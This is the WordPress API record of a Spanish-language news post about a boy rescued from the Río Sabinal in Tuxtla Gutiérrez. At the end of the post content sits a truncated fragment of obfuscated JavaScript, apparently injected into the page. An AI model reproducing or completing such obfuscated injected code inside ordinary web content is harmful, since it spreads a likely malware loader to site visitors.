{"id":2101,"date":"2022-05-12T23:08:33","date_gmt":"2022-05-12T23:08:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2101"},"modified":"2022-05-12T23:08:35","modified_gmt":"2022-05-12T23:08:35","slug":"rescatan-a-menor-que-cayo-al-sabinal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2101","title":{"rendered":"Rescatan a menor que cay\u00f3 al Sabinal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"461\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1652396705024-461x1024.jpg\" alt=\"\" class=\"wp-image-2102\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1652396705024-461x1024.jpg 461w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1652396705024-135x300.jpg 135w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1652396705024-691x1536.jpg 691w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1652396705024.jpg 720w\" sizes=\"auto, (max-width: 461px) 100vw, 461px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 12 de mayo del 2022. Tuxtla Guti\u00e9rrez. &#8211;  Cerca de la una de la tarde de este jueves un menor de aproximadamente 11 a\u00f1os de edad fue rescatado luego de caer en el R\u00edo Sabinal a la altura de la 16 Poniente y Segunda Segunda Norte.De acuerdo con los reportes oficiales, el menor caminaba en esta zona junto con dos de sus hermanos cuando cay\u00f3 al afluente.Algunos testigos llamaron a los n\u00fameros de emergencias para atender la situaci\u00f3n.Fueron los elementos de Protecci\u00f3n Civil del Estado quienes con cuerdas y una canastilla sacaron al ni\u00f1o.El menor fue trasladado al hospital G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada. Derivado la ca\u00edda result\u00f3 con una fractura en el brazo izquierdo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 12 de mayo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Cerca de la una de la tarde de este jueves un menor de aproximadamente 11 a\u00f1os de edad fue rescatado luego de caer en el R\u00edo Sabinal a la altura de la 16 Poniente y Segunda Segunda Norte.De acuerdo con los reportes oficiales, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2102,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-2101","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2101","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2101"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2101\/revisions"}],"predecessor-version":[{"id":2103,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2101\/revisions\/2103"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2102"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2101"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}